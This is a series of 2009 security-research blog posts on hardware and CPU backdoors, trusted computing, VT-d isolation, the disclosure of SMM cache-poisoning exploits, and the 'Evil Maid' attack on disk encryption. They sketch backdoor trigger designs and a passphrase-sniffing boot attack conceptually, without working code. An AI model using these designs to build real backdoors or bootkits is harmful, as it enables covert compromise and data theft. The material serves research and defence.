The backdoors Loic considers are somewhat similar in principle to the simple pseudo-code one-liner backdoor I used in my previous post about hardware backdoors, only more complicated in the actual implementation, as he took care about a few important details, that I naturally didn't concern. (BTW, the main message of my previous post about was how cool technology this VT-d is, being able to prevent PCI-based backdoors, and not about how doomed we are because of Intel- or AMD-induced potential backdoors).

Some people believe that processor backdoors do not exist in reality, because if they did, the competing CPU makers would be able to find them in each others' products, and later would likely cause a "leak" to the public about such backdoors (think: Black PR). Here people make an assumption that AMD or Intel is technically capable of reversing each others processors, which seems to be a natural consequence of them being able to produce them.

I don't think I fully agree with such an assumption though. Just the fact that you are capable of designing and producing a CPU, doesn't mean you can also reverse engineer it. Just the fact that Adobe can write a few hundred megabyte application, doesn't mean they are automatically capable of also reverse engineering similar applications of that size. Even if we assumed that it is technically feasible to use some electron microscope to scan and map all the electronic elements from the processor, there is still a problem of interpreting of how all those hundreds of millions of transistors actually work.

Anyway, a few more thoughts about properties of a hypothetical backdoors that Intel or AMD might use (be using).

First, I think that in such a backdoor scenario everything besides the "trigger" would be encrypted. The trigger is something that you must execute first, in order to activate the backdoor (e.g. the CMP instruction with particular, i.e. magic, values of some registers, say EAX, EBX, ECX, EDX). Only then the backdoor gets activated and e.g. the processor auto-magically escalates into Ring 0. Loic considers this in more detail in his paper. So, my point is that all the attacker's code that executes afterwards, think of it as of a shellcode for the backdoor, that is specific for the OS, is fetched by the processor in an encrypted form and decrypted only internally inside the CPU. That should be trivial to implement, while at the same time should complicate any potential forensic analysis afterwards — it would be highly non-trivial to understand what the backdoor actually have done.

Another crucial thing for a processor backdoor, I think, should be some sort of an anti-reply attack protection. Normally, if a smart admin had been recording all the network traffic, and also all the executables that ever got executed on the host, chances are that he or she would catch the triggering code and the shellcode (which might be encrypted, but still). So, no matter how subtle the trigger is, it is still quite possible that a curious admin will eventually find out that some tetris.exe somehow managed to breakout of a hardware VM and did something strange, e.g. installed a rootkit in a hypervisor (or some Java code somehow was able to send over all our DOCX files from our home directory).

Eventually the curious admin will find out that strange CPU instruction (the trigger) after which all the strange things had happened. Now, if the admin was able to take this code and replicate it, post it to Daily Dave, then, assuming his message would pass through the Moderator (Hi Dave), he would effectively compromise the processor vendor's reputation.

An anti-replay mechanism could ideally be some sort of a challenge-response protocol used in a trigger. So, instead having you always to put 0xdeadbeaf, 0xbabecafe, and 0x41414141 into EAX, EBX and EDX and execute some magic instruction (say CMP), you would have to put a magic that is a result of some crypto operation, taking current date and magic key as input:

Magic = MAGIC (Date, IntelSecretKey).

The obvious problem is how the processor can obtain current date? It would have to talk to the south-bridge at best, which is 1) nontrivial, and 2) observable on a bus, and 3) spoof'able.

A much better idea would be to equip a processor with some sort of an eeprom memory, say big enough to hold one 64-bit or maybe 128-bit value. Each processor would get a different value flashed there when leaving the factory. Now, in order to trigger the backdoor, the processor vendor (or backdoor operator, think: NSA) would have to do the following:

1) First execute some code that would read this unique value stored in eeprom for the particular target processor, and send this back to them,

2) Now, they could generate the actual magic for the trigger:

Magic = MAGIC (UniqeValueInEeprom, IntelSecretKey)

3) ...and send the actual code to execute the backdoor and shellcode, with the correct trigger embedded, based on the magic value.

Now, the point is that the processor will automatically increment the unique number stored in the eeprom, so the same backdoor-exploiting code would not work twice for the same processor (while at the same time it would be easy for NSA to send another exploit, as they know what the next value in the eeprom should be). Also, such a customized exploit would not work on any other CPU, as the assumption was that each CPU gets a different value at the factory, so again it would not be possible to replicate the attack and proved that the particular code has ever done something wrong.

So, the moment I learn that processors have built-in eeprom memory, I will start thinking seriously there are backdoors out there :)

One thing that bothers me with all those divagations about hypothetical backdoors in processors is that I find them pretty useless in at the end of the day. After all, by talking about those backdoors, and how they might be created, we do not make it any easier to protect against them, as there simply is no possible defense here. Also this doesn't make it any easier for us to build such backdoors (if we wanted to become the bad guys for a change). It might only be of an interest to Intel or AMD, or whatever else processor maker, but I somewhat feel they have already spent much more time thinking about it, and chances are they probably can only laugh at what we are saying here, seeing how unsophisticated our proposed backdoors are. So, my Dear Reader, I think you've been just wasting time reading this post ;) Sorry for tricking you into this and I hope to write something more practical next time :)

Thursday, May 28, 2009

Thoughts About Trusted Computing

Here are the slides about Trusted Computing I used for my presentations at the EuSecWest today, and at the Confidence conference last week.

As this was supposed to be a keynote, the slides are much less technical then our other slides, and also there are no new attacks presented there. Still, I hope they might be useful as some sort of an "alternative" introduction to Trusted Computing :)

A cool presentation I saw today was about PCI-based backdoors by Christophe Devine and Guillaume Vissian. They basically took a general-purpose FPGA programmable PC-card (AKA PCMCIA), flashed it with an FPGA "program" that implemented a simple state machine. The purpose of the state machine was to wait until its DMA engine gets initialized and then to modify certain bytes in the host memory, that happened to be part of the winlogon.exe process (IIRC they changed XOR AL, AL into MOV AL, 1, or something like that, at the end of some password verification function inside the winlogon.exe process). The slides should be available soon on the conference website. I also hope they will publish all the source code needed to flash your own personal "winlogon unlocker".

The live demo was really impressive — they showed a winlogon screen, tried to login a few times with wrong passwords, of course all the attempts failed, then they inserted their magic, $300 worth, PC-card, and… 2 seconds later they could log in using any password they wanted.

While not necessary being a breakthrough, as everybody has known such things could be done for years, I think it is still important that somebody eventually implemented this, discussed the technical details (FPGA-related), and also showed how to implement it with a cheap generic "reflashable" hardware without using a soldering iron.

Of course I have also discussed in my presentation how to prevent PCI-based backdoors (like the one discussed here) using VT-d, but this defense is currently only available if you use Xen 3.3 or later, and also requires that you manually create driver domain partitions and come up with a reasonable scheme for assigning devices to driver domains. All in all 99.9% of users are not (and will not be anytime soon) protected against such attacks. Oh, wait, there is actually a relatively simple software-based workaround (besides putting a glue into your PC-card slot, which is not a very subtle one)… I wonder who else will find out :)

Wednesday, March 25, 2009

Trusting Hardware

So, you're a decent paranoid person, running only open source software on your box: Linux, GNU, etc. You have the feeling you could, if you only wanted to, review every single line of code (of course you will probably never do this, but anyway). You might be even more paranoid and also try running an open source BIOS. You feel satisfied and cannot understand all those stupid people running closed source systems like e.g. Windows. Right?

But here's where you are stuck — you still must trust your hardware. Trust that your hardware vendor has not e.g. built in a backdoor into your network card micro-controller…

So, if we buy a laptop from vendor X, that might be based in some not-fully-democratic country, how do we know they didn't put backdoors there? And not only to spy on Americans, also to spy on their own citizens? When was the last time you reverse-engineered all the PCI devices on your motherboard?

Scared? Good!

Enters the game-changer: IOMMU (known as VT-d on Intel). With proper OS/VMM design, this technology can address the very problem of most of the hardware backdoors. A good example of a practical system that allows for that is Xen 3.3, which supports VT-d and allows you to move drivers into a separate, unprivileged driver domain(s). This way each PCI device can be limited to DMA only to the memory region occupied by its own driver.

The network card's microcontroller can still compromise the network card driver, but nothing else. Assuming we are using only encrypted communication, there is not much an attacker can gain by compromising this network card driver, besides doing a DoS. Similarly for the disk driver — if we use full disk encryption (which is a good idea anyway), there is not much an attacker can gain from compromising the low-level disk driver.

Obviously the design of such a system (especially used for desktop computing) is not trivial ans needs to be thoroughly thought out. But it is possible today(!), thanks to those new virtualization technologies.

It seems than, that we could protect ourselves against potentially malicious hardware. With one exception however… we still need to trust the CPU and also the memory controller (AKA northbridge AKA chipset), that implements that IOMMU.

On AMD systems, the memory controller has long been integrated into the processor. Also Intel's recent Nehalem processors integrate the memory controller on the same die.

This all means we need to trust only one vendor (Intel or AMD) and only one component, i.e. The Processor. But should we blindly trust them? After all it would be trivial for Intel or AMD to build in a backdoor into their processor. Even something as simple as:

if (rax == MAGIC_1 && rcx == MAGIC_2) jmp [rbx]

Just a few more gates in the CPU I guess (there are apparently already about 780 million gates on Core i7, so a few more should not make much difference), and no performance penalty. Exploitable remotely on most systems and any more complex program I guess. Yet, totally undetectable for anybody without an electron microscope (and tons of skills and knowledge).

And this is just the simplest example that comes to mind within just a few minutes. I'm sure one could come up with something even more universal and reliable. The fact is — if you are the CPU vendor, it is trivial for you to build in an effective backdoor.

It's funny how various people, e.g. European government institutions, are afraid of using closed source software, e.g. Windows, because they are afraid of Microsoft putting backdoors there. Yet, they are not concerned about using processors made by some other US companies. It is significantly more risky for Microsoft to put a backdoor into its software, where even a skilled teenager equipped with IDA Pro can find it, than it is for Intel or AMD, where effectively nobody can find it.

So, I wonder whether various government and large corporate customers from outside the US will start asking Intel and AMD to provide them with the exact blueprints of their processors. After all they already require Microsoft to provide them with the source code under an NDA, right? So, why not the "source code" for the processor?

Unfortunately there is nothing that could stop a processor vendor to provide its customers with a different blueprints than those that are used to actually "burn" the processors. So, the additional requirement would be needed that they also allow to audit their manufacturing process. Another solution would be to hire some group of independent researchers, equip them with an electron microscope and let them reverse engineer some randomly chosen processors… Hmmm, I even know a team that would love to do that ;)

A quick summary in case you get lost already:
  1. On most systems we are not protected against hardware backdoors, e.g. in the network card controller.
  2. New technologies, e.g. Intel VT-d, can allow to protect against potentially malicious hardware (requires specially designed OS, e.g. specially configured Xen)…
  3. … except for the potential backdoors in the processor.
  4. If we don't trust Microsoft, why should we trust Intel or AMD?
BTW, in May I will be speaking at the Confidence conference in Krakow, Poland. This is gonna be a keynote, so don't expect new attacks to be revealed, but rather some more philosophical stuff about trusted computing (why it is not evil) and problems like the one discussed today. See you there!

Friday, March 20, 2009

The Sky Is Falling?

A few reporters asked me if our recent paper on SMM attacking via CPU cache poisoning means the sky is really falling now?

Interestingly, not many people seem to have noticed that this is the 3rd attack against SMM our team has found in the last 10 months. OMG :o

But anyway, does the fact we can easily compromise the SMM today, and write SMM-based malware, does that mean the sky is falling for the average computer user?

No! The sky has actually fallen many years ago… Default users with admin privileges, monolithic kernels everywhere, most software unsigned and downloadable over plaintext HTTP — these are the main reasons we cannot trust our systems today. And those pathetic attempts to fix it, e.g. via restricting admin users on Vista, but still requiring full admin rights to install any piece of stupid software. Or selling people illusion of security via A/V programs, that cannot even protect themselves properly…

It's also funny how so many people focus on solving the security problems by "Security by Correctness" or "Security by Obscurity" approaches — patches, patches, NX and ASLR — all good, but it is not gonna work as an ultimate protection (if it could, it would worked out already).

On the other hand, there are some emerging technologies out there that could allow us to implement effective "Security by Isolation" approach. Such technologies as VT-x/AMD-V, VT-d/IOMMU or Intel TXT and TPM.

So we, at ITL, focus on analyzing those new technologies, even though almost nobody uses them today. Because those technologies could actually make the difference. Unlike A/V programs or Patch Tuesdays, those technologies can change the level of sophistication required for the attacker dramatically.

The attacks we focus on are important for those new technologies — e.g. today Intel TXT is pretty much useless without protection from SMM attacks. And currently there is no such protection, which sucks. SMM rootkits sound sexy, but, frankly, the bad guys are doing just fine using traditional kernel mode malware (due to the fact that A/V is not effective). Of course, SMM rootkits are just yet another annoyance for the traditional A/V programs, which is good, but they might not be the most important consequence of SMM attacks.

So, should the average Joe Dow care about our SMM attacks? Absolutely not!

Thursday, March 19, 2009

Attacking SMM Memory via Intel® CPU Cache Poisoning

As promised, the paper and the proof of concept code has just been posted on the ITL website here.

A quote from the paper:
In this paper we have described practical exploitation of the CPU cache poisoning in order to read or write into (otherwise protected) SMRAM memory. We have implemented two working exploits: one for dumping the content of SMRAM and the other one for arbitrary code execution in SMRAM. This is the third attack on SMM memory our team has found within the last 10 months, affecting Intel-based systems. It seems that current state of firmware security, even in case of such reputable vendors as Intel, is quite unsatisfying.

The potential consequence of attacks on SMM might include SMM rootkits [9], hypervisor compromises [8], or OS kernel protection bypassing [2].
Don't worry, the shellcode we use in the exploit is totally harmless (have really no idea how some people concluded we were going to release an SMM rootkit today?) — it only increases an internal counter on every SMI and jumps back to the original handler. If you want something more fancy, AKA SMM rootkits, you might want to re-read Sherri's and Shawn's last year's Black Hat paper and try writing something they describe there.

The attack presented in the paper has been fixed on some systems according to Intel. We have however found out that even the relatively new boards, like e.g. Intel DQ35 are still vulnerable (the very recent Intel DQ45 doesn't seem to be vulnerable though). The exploit attached is for DQ35 board — the offsets would have to be changed to work on other boards (please do not ask how to do this).

Keep in mind this is a different SMM attack than the one we mentioned during our last month's Black Hat presentation on TXT bypassing (the VU#127284). We are planning to present that other attack at the upcoming Black Hat Vegas. Hopefully this will not be the only one thing that ITL will entertain you with in Vegas — Alex and Rafal are already working now on something even cooler (and even lower level) for the show, so cross your fingers!

And good luck to Loic with his presentation that is about to start just now...

Friday, March 13, 2009

Independent Attack Discoveries

Next week's Thursday, March 19th, 1600 UTC, we will publish a paper (+ exploits) on exploiting Intel® CPU cache mechanisms.

The attack allows for privilege escalation from Ring 0 to the SMM on many recent motherboards with Intel CPUs. Interestingly, the very same attack will be presented by another researcher, Loic Duflot, at the CanSecWest conference in Vancouver, Canada, on... Thursday 19th, 1600 UTC. BTW, this is a different SMM-targeting attack than the one we mentioned during our recent TXT talk and that is scheduled to be presented later this year.

Here's the full story (there is also a moral at the end) …

Just after our presentation at the Black Hat last month, we (i.e. Rafal and I) have been independently approached by some person (or two different persons — we haven't figured that out actually — there were some ca. 30 people willing to ask us questions after the talk, so it's hard to remember all the faces), who was very curious about our SMM attacks (whose details we haven't discussed, of course, because Intel is still working on a fix). This person(s) started asking various questions about the attacks and one of the questions, that was asked to both me and Rafal, was if the attack used caching. Later that day, during a private ITL dinner, one of us brought this issue, and we started thinking if it was indeed possible to perform an SMM attack via CPU caching. By the end of the dinner we have sketched out the attack, and later when we got back to Poland, Rafal implemented a working exploit with code execution in SMM in a matter of just a few hours. (I think I used way too many parenthesis in this paragraph).

So, being the good and responsible guys that we are, we immediately reported the new bug to Intel (actually talking to Intel's PSIRT is getting more and more routined for us in the recent months ;). And this is how we learnt that Loic came up with the same attack (back then there was no talk description at the conference website) — apparently he approached Intel about this back in October 2008, so 3-4 months before us — and also that he's planning to present it at the CanSecWest conference in March. So, we contacted Loic and agreed to do coordinated disclosure next Thursday.

Interestingly, however, none of us was even close to being the first discoverer of the underlying problem that our attacks exploit. In fact, the first mention of the possible attack using caching for compromising SMM has been discussed in certain documents authored as early as the end of 2005 (!) by nobody else than... Intel's own employees. Stay tuned for the details in our upcoming paper.

Conclusion

If there is a bug somewhere and if it stays unpatched for enough time, it is almost guaranteed that various people will (re)discover and exploit it, sooner or later. So, don't blame researchers that they find and publish information about bugs — they actually do a favor to our society. Remember the guy who asked us if our attack used caching? I bet he (or his associates) also have had exploits for this caching bug, but apparently didn't notify the vendor. Hmm, what they might have been doing with the exploit? When was the last time you scanned your system for SMM rootkits? ;)

Anyways, congrats to Loic for being the first one who wrote exploits for this bug. Also congrats to Intel employees who originally noticed the problem back in 2005.

Thursday, February 19, 2009

Attacking Intel TXT: paper and slides

The new press release covering the basic details about our TXT attack is here.

The paper is here.

The slides converted to a PDF format are here. There is also an original version of slides in the Keynote format here for the Mac people. And for all the other people who don't use Mac, but still value the aesthetics (?!), I have also generated a QuickTime clickable movie out from the Keynote slides -- it can be found here, but it weighs 80MB.

Enjoy.

Tuesday, February 10, 2009

Nesting VMMs, Reloaded.

Besides breaking the Intel's stuff, we have also been doing other things over at our lab. Thought I would share this cool screenshot of a Virtual PC running inside Xen. More precisely what you see on the pic is: Windows XP running inside Virtual PC, that runs inside Vista, which itself runs inside a Xen's HVM VM. Both the Virtual PC and Xen are using the Intel's hardware virtualization (VT-x is always used for HVM guests on Xen).

Our Nested Xen patch is part of a work done for a customer, so it is not going to be published. Besides it is currently a bit unstable ;) It's just a prototype that shows such a thing could be done.

Monday, January 26, 2009

Closed Source Conspiracy

Many people in the industry have an innate fear of closed source (AKA proprietary software), which especially applies to everything crypto-related.

The usual arguments go this way: this (proprietary) crypto software is bad, because the vendor might have put some backdoors in there. And: only the open source crypto software, which can be reviewed by anyone, can be trusted! So, after my recent post, quite a few people wrote to me and asked how I could defend such an evil thing as BitLocker, which is proprietary, and, even worse, comes from Microsoft?

I personally think this way of reasoning sucks. In majority of cases, the fact something is distributed without the accompanying source code does not prevent others from analyzing the code. We do have advanced disassemblers and debuggers, and it is really not that difficult to make use of them as many people think.

Of course, some heavily obfuscated programs can be extremely difficult to analyze. Also, analyzing a chipset's firmware, when you do not even know the underlying CPU architecture and the I/O map might be hard. But these are special cases and do not apply to majority of software, that usually is not obfuscated at all.

It seems like the argument of Backdoored Proprietary Software usually comes from the open-source people, who are used to unlimited accesses to the source code, and consequently do not usually have much experience with advanced reverse engineer techniques, simply because they do not need them in their happy "Open Source Life". It's all Darwinism, after all ;)

On the other hand, some things are hard to analyze, regardless of whether the source code is available or not, think: crypto. Also, how many of you who actively use open source crypto software, e.g. TrueCrypt or GnuPG, have actually reviewed the source code? Anyone?

You might be thinking — maybe I haven't looked at the source code myself, but because it is open source, zillions of other users already have reviewed it. And if there was some backdoor in there, they would undoubtedly have found it already! Well, for all those open source fetishists, who blindly negate the value of anything that is not open source, I have only one word to say: Debian.

Keep in mind: I do not say closed source is more secure than open source — I only resist the open-source fundamentalism, that defines every proprietary software as inherently insecure, and everything open source as ultimately secure.

So, how should one (e.g. a government institution) verify security-level of a given crypto software, e.g. to ensure there are no built-in backdoors in there? I personally doubt it could be performed by one team, as it just usually happens that the same people who might be exceptionally skilled in code review, system-level security, etc, at the same time are average cryptographers and vice-versa.

Imagine e.g. that you need to find out if there are any weaknesses in your system drive encryption software, something like BitLocker. Even if you get access to the source code, you still would have to analyze a lot of system-level details — how is the trusted boot implemented (SRTM? DRTM? TPM interaction?), which system software is trusted, how the implementation withstands various not-crypto-related attacks (e.g. some of the attacks I described in my previous post), etc…

But this all is just system-level evaluation. What should come later is to analyze the actual crypto algorithms and protocols. Those later tasks fall into cryptography field and not into system-level security discipline, and consequently should be performed by some other team, the crypto experts.

So, no doubt, it is not an easy task, and the fact if there is or there is not C/C++ source code available, is usually one of the minor headaches (a good example is our attack on TXT, where we were able to discover bugs in Intel's specific system software, which, of course, is not open source).

Wednesday, January 21, 2009

Why do I miss Microsoft BitLocker?

In the previous post, I wrote the only one thing I really miss after I've switched from Vista to Mac is the BitLocker Driver Encryption. I thought it might be interesting for others to understand my position, so below I describe why I think BitLocker is so cool, and why I think other system disk encryption software sucks.

So, it's all about the Trusted Boot. BitLocker does make use of a trusted boot process, while all the other system encryption software I'm aware of, does not. But why the trusted boot feature is so useful? Let's start with a quick digression about what the trusted boot process is…

Trusted boot can be implemented using either a Static Root of Trust or a Dynamic Root of Trust.

The Static Root of Trust approach (also known as Static Root of Trust Measurement or SRTM) is pretty straightforward — the system starts booting from some immutable piece of firmware code that we assume is always trusted (hence the static root) and that initiates the measurement process, in which each component measures the next one in a chain. So, e.g. this immutable piece of firmware will first calculate the hash of the BIOS and extend a TPM's PCR register with the value of this hash. Then the BIOS does the same with the PCI EEPROMs and the MBR, before handling execution to them. Then the bootloader measures the OS loader before executing it. And so on.

An alternative method to implementing trusted boot is to use Dynamic Root of Trust (often called Dynamic Root of Trust Measurement or DRTM). Intel's TXT technology, formerly LaGrande, is an example of a DRTM (more precisely: TXT is more than just DRTM, but DRTM is the central concept on which TXT is built). We will be talking a lot about TXT next month at Black Hat in DC :) This will include discussion of why DRTM might sometimes be preferred over SRTM and, of course, what are the challenges with both.

Essentially, both SRTM and DRTM, in the context of a trusted boot, are supposed to provide the same: assurance the system that just booted is actually the system that we wanted to boot (i.e. the trusted one) and not some modified system (e.g. compromised by an MBR virus).

BitLocker uses the Static Root of Trust Measurement. SRTM can really make sense when we combine it with either TPM sealing or attestation feature. BitLocker uses the former to make sure that only the trusted system can get access to the disk decryption key. In other words: BitLocker relies on the TPM that it will unseal (release) the decryption key (needed to decrypt the system partition) when and only when the state of chosen PCR registers is the same is it was when the decryption key was sealed into the TPM.

Ok, why is this trusted boot process so important for the system disk encryption software? Because it protects against a simple two-stage attack:
  1. You leave your laptop (can be even fully powered down) in a hotel room and go down for a breakfast… Meanwhile an Evil Maid enters your room. She holds an Evil USB stick in her hand and plugs it into your laptop and presses the power button. The system starts and boots from the USB. An Evil version of something similar to our BluePillBoot gets installed into the MBR (or to a PCI EEPROM). This Evil Program has only one task — to sniff out the encryption software's password/PIN and then report it back to the maid next time she comes...
  2. So, you come back to your room to brush your teeth after the breakfast. Obviously you cannot refrain from not turning on your laptop for a while. You just need to enter your disk encryption passphrase/PIN/whatever. Your encryption software happily displays the prompt, like if nothing happened. After all how could it possibly know the Evil Program, like BluePillBoot, has just been loaded a moment ago from the MBR or a PCI EEPROM? It can not! So, you enter the valid password, your system gets the decryption key and you can get access to your encrypted system...
  3. But then you have an appointment at the hotel SPA (at least this little fun you can have on a business trip, right?). Obviously you don't want to look so geeky and you won't take your laptop with you to the SPA, will you? The Evil Maid just waited for this occasion… She sneaks again into your room and powers up your laptop. She presses a magic key combo, which results in the Evil Program displaying the sniffed decryption password. Now, depending on their level of subtleness, she could either steal your whole laptop or only some more important data from the laptop. Your system disk encryption software is completely useless against her now.
(Yes, I know that's 3 bullets, but the Evil Maid had to sneak into your room only twice:)

So, why the BitLocker would not allow for this simple attack? Because the BitLocker software should actually be able to know that the system gets compromised (by the Evil Program) since the last boot. BitLocker should then refuse to display a password prompt. And even if it didn't and asked the user for the password, still it should not be able to get the actual decryption key out from the TPM, because the values in the certain PCR register(s) will be wrong (they will now account for the modified hashes of the MBR or PCI EEPROM or BIOS). The bottom line is: the maid is not getting the decryption key (just as the user now), which is what this is all about.

At least this is how the BitLocker should work. I shall add a disclaimer here, that neither myself, nor anybody from my team, have looked into the BitLocker implementation. We have not, because, as of yet, there have been no customers interested in this kind of BitLocker implementation evaluation. Also, I should add that Microsoft has not paid me to write this article. I simply hope this might positively stimulate other vendors, like e.g. TrueCrypt (Hi David!), or Apple, to add SRTM or, better yet, DRTM, to their system encryption products.

Of course, when we consider an idiot-attack, that involves simply garbbing somebody's laptop and running away with it (i.e. without any prior preparation like our Evil Maid did), then probably all system disk encryption software would be just good enough (assuming it doesn't have any bugs in the crypto code).

Some people might argue that using a BIOS password would be just as good as using trusted boot. After all, if we disable booting from alternate media in BIOS (e.g. from USB sticks) and lock down the BIOS using a password (i.e. using the Power-On password, not just the BIOS supervisor password), then the above two-stage attacks should not be feasible. Those people might argue, that even if the Evil Maid had cleared the CMOS memory (by removing the CMOS battery from the motherboard), still they would be able to notice that something is wrong — the BIOS would not longer be asking for the password, or the password would be different from what they used before.

That is a valid point, but relaying on the BIOS password to provide security for all your data might not be such a good idea. First problem is that all the BIOSes have had a long history of various default or "maintenance" passwords (I actually do not know how the situation looks today with those default passwords). Another problem is that the attacker might first clear the CMOS memory, and then modify her Evil MBR program to also display a fake BIOS password prompt, that would accept anything the user enters. This way the user will not be alerted that something is wrong and will be willing to provide the real password for drive decryption when prompted later by the actual drive encryption software.

One might ask why can't the attacker use the similar attack against BitLocker? Even if the real BitLocker uses trusted boot process, we can still infect the MBR, display the fake BitLocker PIN prompt and this way get into the possession of the user's PIN.

This attack, however, can be spotted by an inquisitive user — after all, if he or she knows they provided the correct PIN, then it would be suspicious not to see the system being booted (and it won't boot, because the fake BitLocker will not be able to retrieve the password from the TPM). If the fake BitLocker wanted to boot the OS (so that user didn't suspect anything), it would have to remove itself from the system and then reboot the system. Again this should alert the user that something wrong is going on.

There is also a much more elegant way of defending against the above attack (with fake BitLocker prompt) — but I'd rather let Microsoft to figure it out by themselves ;)

By the way, contrary to a popular belief the BitLocker doesn't protect your computer from boot-stage infections, e.g. MBR viruses or BIOS/PCI rootkits. As we have been pointing out since the first edition of our Understanding Stealth Malware training at Black Hat in August 2007, BitLocker should not be thought as of a system integrity protection. This is because it is trivial, for any malware that already got access to the running Vista, to re-seal the BitLocker key to arbitrary new system firmware/MBR configuration. Everybody can try it by going to Control Panel/BitLocker Driver Encryption, then clicking on the "Turn Off BitLocker" and choosing "Disable BitLocker Drive Encryption". This will simply save your disk decryption key in plaintext, allowing you to e.g. reflash your BIOS, boot Vista again and then to enable BitLocker again (this would generate a new key and seal it to the TPM with the new PCR values).


This functionality has been provided obviously to allow user to update his or her firmware. But what is important to keep in mind is that this process of disabling BitLocker doesn't involve entering any special password or PIN (e.g. the BitLocker's PIN). It just enough that you are the default user with admin rights or some malware running in this context. Pity they decided on the simplest solution here. But still BitLocker is simply the one coolest thing in Vista and something I really miss on all other OSes...